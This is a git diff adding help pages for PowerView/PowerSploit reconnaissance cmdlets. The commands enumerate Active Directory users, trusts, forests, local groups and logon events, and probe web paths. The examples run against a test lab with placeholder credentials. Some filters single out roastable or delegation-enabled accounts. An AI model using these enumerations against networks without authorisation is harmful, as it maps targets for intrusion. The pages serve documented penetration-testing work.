+Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +{{Fill ServerTimeLimit Description}} + +```yaml +Type: Int32 +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +{{Fill Tombstone Description}} + +```yaml +Type: SwitchParameter +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### None + + +## OUTPUTS + +### PowerView.DomainTrust.NET +PowerView.DomainTrust.LDAP +PowerView.DomainTrust.API + + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainUser.md b/docs/Recon/Get-DomainUser.md new file mode 100755 index 0000000..7247a1d --- /dev/null +++ b/docs/Recon/Get-DomainUser.md @@ -0,0 +1,426 @@ +# Get-DomainUser + +## SYNOPSIS +Return all users or specific user objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-ADName, Convert-LDAPProperty + +## SYNTAX + +### AllowDelegation (Default) +``` +Get-DomainUser [[-Identity] ] [-SPN] [-AdminCount] [-AllowDelegation] [-KerberosPreuthNotRequired] + [-Domain ] [-LDAPFilter ] [-Properties ] [-SearchBase ] [-Server ] + [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] + [-Tombstone] [-FindOne] [-Credential ] [-Raw] +``` + +### DisallowDelegation +``` +Get-DomainUser [[-Identity] ] [-SPN] [-AdminCount] [-DisallowDelegation] [-KerberosPreuthNotRequired] + [-Domain ] [-LDAPFilter ] [-Properties ] [-SearchBase ] [-Server ] + [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] + [-Tombstone] [-FindOne] [-Credential ] [-Raw] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. +To only return specific properies, use +"-Properties samaccountname,usnchanged,...". +By default, all user objects for +the current domain are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainUser -Domain testlab.local +``` + +Return all users for the testlab.local domain + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainUser "S-1-5-21-890171859-3433809279-3366196753-1108","administrator" +``` + +Return the user with the given SID, as well as Administrator. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff +``` + +lastlogoff samaccountname +---------- -------------- +12/31/1600 4:00:00 PM dfm.a +12/31/1600 4:00:00 PM dfm +12/31/1600 4:00:00 PM harmj0y +12/31/1600 4:00:00 PM Administrator + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-DomainUser -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -AdminCount -AllowDelegation +``` + +Search the specified OU for privileged user (AdminCount = 1) that allow delegation + +### -------------------------- EXAMPLE 5 -------------------------- +``` +Get-DomainUser -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon +``` + +Search for users with a primary group ID other than 513 ('domain users') and only return samaccountname and lastlogon + +### -------------------------- EXAMPLE 6 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainUser -Credential $Cred + +### -------------------------- EXAMPLE 7 -------------------------- +``` +Get-Domain | Select-Object -Expand name +``` + +testlab.local + +Get-DomainUser dev\user1 -Verbose -Properties distinguishedname +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: \[Get-DomainUser\] filter string: (&(samAccountType=805306368)(|(samAccountName=user1))) + +distinguishedname +----------------- +CN=user1,CN=Users,DC=dev,DC=testlab,DC=local + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. +Also accepts DOMAIN\user format. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -SPN +Switch. +Only return user objects with non-null service principal names. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -AdminCount +Switch. +Return users with '(adminCount=1)' (meaning are/were privileged). + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -AllowDelegation +Switch. +Return user accounts that are not marked as 'sensitive and not allowed for delegation' + +```yaml +Type: SwitchParameter +Parameter Sets: AllowDelegation +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -DisallowDelegation +Switch. +Return user accounts that are marked as 'sensitive and not allowed for delegation' + +```yaml +Type: SwitchParameter +Parameter Sets: DisallowDelegation +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -KerberosPreuthNotRequired +Switch. +Return user accounts with "Do not require Kerberos preauthentication" set. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Raw +Switch. +Return raw results instead of translating the fields into a custom PSObject. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### String + +## OUTPUTS + +### PowerView.User + +Custom PSObject with translated user property fields. + +PowerView.User.Raw + +The raw DirectoryServices.SearchResult object, if -Raw is enabled. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainUserEvent.md b/docs/Recon/Get-DomainUserEvent.md new file mode 100755 index 0000000..c844981 --- /dev/null +++ b/docs/Recon/Get-DomainUserEvent.md @@ -0,0 +1,144 @@ +# Get-DomainUserEvent + +## SYNOPSIS +Enumerate account logon events (ID 4624) and Logon with explicit credential +events (ID 4648) from the specified host (default of the localhost). + +Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-DomainUserEvent [[-ComputerName] ] [-StartTime ] [-EndTime ] + [-MaxEvents ] [-Credential ] +``` + +## DESCRIPTION +This function uses an XML path filter passed to Get-WinEvent to retrieve +security events with IDs of 4624 (logon events) or 4648 (explicit credential +logon events) from -StartTime (default of now-1 day) to -EndTime (default of now). +A maximum of -MaxEvents (default of 5000) are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainUserEvent +``` + +Return logon events on the local machine. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainController | Get-DomainUserEvent -StartTime ([DateTime]::Now.AddDays(-3)) +``` + +Return all logon events from the last 3 days from every domain controller in the current domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainUserEvent -ComputerName PRIMARY.testlab.local -Credential $Cred -MaxEvents 1000 + +Return a max of 1000 logon events from the specified machine using the specified alternate credentials. + +## PARAMETERS + +### -ComputerName +Specifies the computer name to retrieve events from, default of localhost. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: dnshostname, HostName, name + +Required: False +Position: 1 +Default value: $Env:COMPUTERNAME +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -StartTime +The \[DateTime\] object representing the start of when to collect events. +Default of \[DateTime\]::Now.AddDays(-1). + +```yaml +Type: DateTime +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [DateTime]::Now.AddDays(-1) +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -EndTime +The \[DateTime\] object representing the end of when to collect events. +Default of \[DateTime\]::Now. + +```yaml +Type: DateTime +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [DateTime]::Now +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -MaxEvents +The maximum number of events to retrieve. +Default of 5000. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 5000 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target computer. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.LogonEvent + +PowerView.ExplicitCredentialLogonEvent + +## NOTES + +## RELATED LINKS + +[http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/](http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/) + diff --git a/docs/Recon/Get-Forest.md b/docs/Recon/Get-Forest.md new file mode 100755 index 0000000..51ddef6 --- /dev/null +++ b/docs/Recon/Get-Forest.md @@ -0,0 +1,80 @@ +# Get-Forest + +## SYNOPSIS +Returns the forest object for the current (or specified) forest. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: ConvertTo-SID + +## SYNTAX + +``` +Get-Forest [[-Forest] ] [-Credential ] +``` + +## DESCRIPTION +Returns a System.DirectoryServices.ActiveDirectory.Forest object for the current +forest or the forest specified with -Forest X. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-Forest -Forest external.domain +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-Forest -Credential $Cred + +## PARAMETERS + +### -Forest +The forest name to query for, defaults to the current forest. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target forest. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.Management.Automation.PSCustomObject + +Outputs a PSObject containing System.DirectoryServices.ActiveDirectory.Forest in addition +to the forest root domain SID. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-ForestDomain.md b/docs/Recon/Get-ForestDomain.md new file mode 100755 index 0000000..d755c0c --- /dev/null +++ b/docs/Recon/Get-ForestDomain.md @@ -0,0 +1,82 @@ +# Get-ForestDomain + +## SYNOPSIS +Return all domains for the current (or specified) forest. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Forest + +## SYNTAX + +``` +Get-ForestDomain [[-Forest] ] [-Credential ] +``` + +## DESCRIPTION +Returns all domains for the current forest or the forest specified +by -Forest X. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ForestDomain +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-ForestDomain -Forest external.local +``` + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-ForestDomain -Credential $Cred + +## PARAMETERS + +### -Forest +Specifies the forest name to query for domains. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target forest. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.DirectoryServices.ActiveDirectory.Domain + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-ForestGlobalCatalog.md b/docs/Recon/Get-ForestGlobalCatalog.md new file mode 100755 index 0000000..c6da4bd --- /dev/null +++ b/docs/Recon/Get-ForestGlobalCatalog.md @@ -0,0 +1,78 @@ +# Get-ForestGlobalCatalog + +## SYNOPSIS +Return all global catalogs for the current (or specified) forest. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Forest + +## SYNTAX + +``` +Get-ForestGlobalCatalog [[-Forest] ] [-Credential ] +``` + +## DESCRIPTION +Returns all global catalogs for the current forest or the forest specified +by -Forest X by using Get-Forest to retrieve the specified forest object +and the .FindAllGlobalCatalogs() to enumerate the global catalogs. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ForestGlobalCatalog +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-ForestGlobalCatalog -Credential $Cred + +## PARAMETERS + +### -Forest +Specifies the forest name to query for global catalogs. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.DirectoryServices.ActiveDirectory.GlobalCatalog + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-ForestTrust.md b/docs/Recon/Get-ForestTrust.md new file mode 100755 index 0000000..0ff5e3d --- /dev/null +++ b/docs/Recon/Get-ForestTrust.md @@ -0,0 +1,91 @@ +# Get-ForestTrust + +## SYNOPSIS +Return all forest trusts for the current forest or a specified forest. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Forest + +## SYNTAX + +``` +Get-ForestTrust [[-Forest] ] [-Credential ] +``` + +## DESCRIPTION +This function will enumerate domain trust relationships for the current (or a remote) +forest using number of method using the .NET method GetAllTrustRelationships() on a +System.DirectoryServices.ActiveDirectory.Forest returned by Get-Forest. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ForestTrust +``` + +Return current forest trusts. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-ForestTrust -Forest "external.local" +``` + +Return trusts for the "external.local" forest. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-ForestTrust -Forest "external.local" -Credential $Cred + +Return trusts for the "external.local" forest using the specified alternate credenitals. + +## PARAMETERS + +### -Forest +Specifies the forest to query for trusts, defaults to the current forest. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.DomainTrust.NET + +A TrustRelationshipInformationCollection returned when using .NET methods (default). + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-HttpStatus.md b/docs/Recon/Get-HttpStatus.md new file mode 100755 index 0000000..a8a7dbb --- /dev/null +++ b/docs/Recon/Get-HttpStatus.md @@ -0,0 +1,106 @@ +# Get-HttpStatus + +## SYNOPSIS +Returns the HTTP Status Codes and full URL for specified paths. + +PowerSploit Function: Get-HttpStatus +Author: Chris Campbell (@obscuresec) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Get-HttpStatus [-Target] [[-Path] ] [[-Port] ] [-UseSSL] +``` + +## DESCRIPTION +A script to check for the existence of a path or file on a webserver. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt | Select-Object {where StatusCode -eq 20*} +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL +``` + +## PARAMETERS + +### -Target +Specifies the remote web host either by IP or hostname. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Path +Specifies the remost host. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: .\Dictionaries\admin.txt +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Port +Specifies the port to connect to. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UseSSL +Use an SSL connection. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES +HTTP Status Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error + +## RELATED LINKS + +[http://obscuresecurity.blogspot.com +http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html]() + diff --git a/docs/Recon/Get-NetComputerSiteName.md b/docs/Recon/Get-NetComputerSiteName.md new file mode 100755 index 0000000..1a3a964 --- /dev/null +++ b/docs/Recon/Get-NetComputerSiteName.md @@ -0,0 +1,89 @@ +# Get-NetComputerSiteName + +## SYNOPSIS +Returns the AD site where the local (or a remote) machine resides. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +## SYNTAX + +``` +Get-NetComputerSiteName [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +This function will use the DsGetSiteName Win32API call to look up the +name of the site where a specified computer resides. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local +``` + +Returns the site for WINDOWS1.testlab.local. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainComputer | Get-NetComputerSiteName +``` + +Returns the sites for every machine in AD. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to check the site for (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ComputerSite + +A PSCustomObject containing the ComputerName, IPAddress, and associated Site name. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-NetLocalGroup.md b/docs/Recon/Get-NetLocalGroup.md new file mode 100755 index 0000000..29ac4d6 --- /dev/null +++ b/docs/Recon/Get-NetLocalGroup.md @@ -0,0 +1,132 @@ +# Get-NetLocalGroup + +## SYNOPSIS +Enumerates the local groups on the local (or remote) machine. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +``` +Get-NetLocalGroup [[-ComputerName] ] [-Method ] [-Credential ] +``` + +## DESCRIPTION +This function will enumerate the names and descriptions for the +local groups on the current, or remote, machine. +By default, the Win32 API +call NetLocalGroupEnum will be used (for speed). +Specifying "-Method WinNT" +causes the WinNT service provider to be used instead, which returns group +SIDs along with the group names and descriptions/comments. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-NetLocalGroup +``` + +ComputerName GroupName Comment +------------ --------- ------- +WINDOWS1 Administrators Administrators have comple... +WINDOWS1 Backup Operators Backup Operators can overr... +WINDOWS1 Cryptographic Operators Members are authorized to ... +... + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-NetLocalGroup -Method Winnt +``` + +ComputerName GroupName GroupSID Comment +------------ --------- -------- ------- +WINDOWS1 Administrators S-1-5-32-544 Administrators hav... +WINDOWS1 Backup Operators S-1-5-32-551 Backup Operators c... +WINDOWS1 Cryptographic Opera... +S-1-5-32-569 Members are author... +... + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-NetLocalGroup -ComputerName primary.testlab.local +``` + +ComputerName GroupName Comment +------------ --------- ------- +primary.testlab.local Administrators Administrators have comple... +primary.testlab.local Users Users are prevented from m... +primary.testlab.local Guests Guests have the same acces... +primary.testlab.local Print Operators Members can administer dom... +primary.testlab.local Backup Operators Backup Operators can overr... + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for sessions (also accepts IP addresses). +Defaults to the localhost. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: $Env:COMPUTERNAME +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Method +The collection method to use, defaults to 'API', also accepts 'WinNT'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: CollectionMethod + +Required: False +Position: Named +Default value: API +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to a remote machine. +Only applicable with "-Method WinNT". + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.LocalGroup.API + +Custom PSObject with translated group property fields from API results. + +PowerView.LocalGroup.WinNT + +Custom PSObject with translated group property fields from WinNT results. + +## NOTES + +## RELATED LINKS + +[https://msdn.microsoft.com/en-us/library/windows/desktop/aa370440(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/windows/desktop/aa370440(v=vs.85).aspx) + diff --git a/docs/Recon/Get-NetLocalGroupMember.md b/docs/Recon/Get-NetLocalGroupMember.md new file mode 100755 index 0000000..302302b --- /dev/null +++ b/docs/Recon/Get-NetLocalGroupMember.md @@ -0,0 +1,212 @@ +# Get-NetLocalGroupMember + +## SYNOPSIS +Enumerates members of a specific local group on the local (or remote) machine. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Convert-ADName + +## SYNTAX + +``` +Get-NetLocalGroupMember [[-ComputerName] ] [-GroupName ] [-Method ] + [-Credential ] +``` + +## DESCRIPTION +This function will enumerate the members of a specified local group on the +current, or remote, machine. +By default, the Win32 API call NetLocalGroupGetMembers +will be used (for speed). +Specifying "-Method WinNT" causes the WinNT service provider +to be used instead, which returns a larger amount of information. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-NetLocalGroupMember | ft +``` + +ComputerName GroupName MemberName SID IsGroup IsDomain +------------ --------- ---------- --- ------- -------- +WINDOWS1 Administrators WINDOWS1\Ad... +S-1-5-21-25... +False False +WINDOWS1 Administrators WINDOWS1\lo... +S-1-5-21-25... +False False +WINDOWS1 Administrators TESTLAB\Dom... +S-1-5-21-89... +True True +WINDOWS1 Administrators TESTLAB\har... +S-1-5-21-89... +False True + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-NetLocalGroupMember -Method winnt | ft +``` + +ComputerName GroupName MemberName SID IsGroup IsDomain +------------ --------- ---------- --- ------- -------- +WINDOWS1 Administrators WINDOWS1\Ad... +S-1-5-21-25... +False False +WINDOWS1 Administrators WINDOWS1\lo... +S-1-5-21-25... +False False +WINDOWS1 Administrators TESTLAB\Dom... +S-1-5-21-89... +True True +WINDOWS1 Administrators TESTLAB\har... +S-1-5-21-89... +False True + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-NetLocalGroup | Get-NetLocalGroupMember | ft +``` + +ComputerName GroupName MemberName SID IsGroup IsDomain +------------ --------- ---------- --- ------- -------- +WINDOWS1 Administrators WINDOWS1\Ad... +S-1-5-21-25... +False False +WINDOWS1 Administrators WINDOWS1\lo... +S-1-5-21-25... +False False +WINDOWS1 Administrators TESTLAB\Dom... +S-1-5-21-89... +True True +WINDOWS1 Administrators TESTLAB\har... +S-1-5-21-89... +False True +WINDOWS1 Guests WINDOWS1\Guest S-1-5-21-25... +False False +WINDOWS1 IIS_IUSRS NT AUTHORIT... +S-1-5-17 False False +WINDOWS1 Users NT AUTHORIT... +S-1-5-4 False False +WINDOWS1 Users NT AUTHORIT... +S-1-5-11 False False +WINDOWS1 Users WINDOWS1\lo... +S-1-5-21-25... +False UNKNOWN +WINDOWS1 Users TESTLAB\Dom... +S-1-5-21-89... +True UNKNOWN + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-NetLocalGroupMember -ComputerName primary.testlab.local | ft +``` + +ComputerName GroupName MemberName SID IsGroup IsDomain +------------ --------- ---------- --- ------- -------- +primary.tes... +Administrators TESTLAB\Adm... +S-1-5-21-89... +False False +primary.tes... +Administrators TESTLAB\loc... 